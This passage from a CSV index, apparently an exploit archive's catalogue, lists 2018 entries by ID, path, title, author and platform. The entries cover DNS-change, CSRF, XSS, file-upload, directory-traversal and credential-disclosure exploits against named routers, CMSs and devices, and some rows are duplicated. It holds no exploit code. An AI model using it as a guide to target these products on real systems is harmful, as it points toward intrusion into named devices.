44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php,
44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php,
44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,

Can't render this file because it is too large.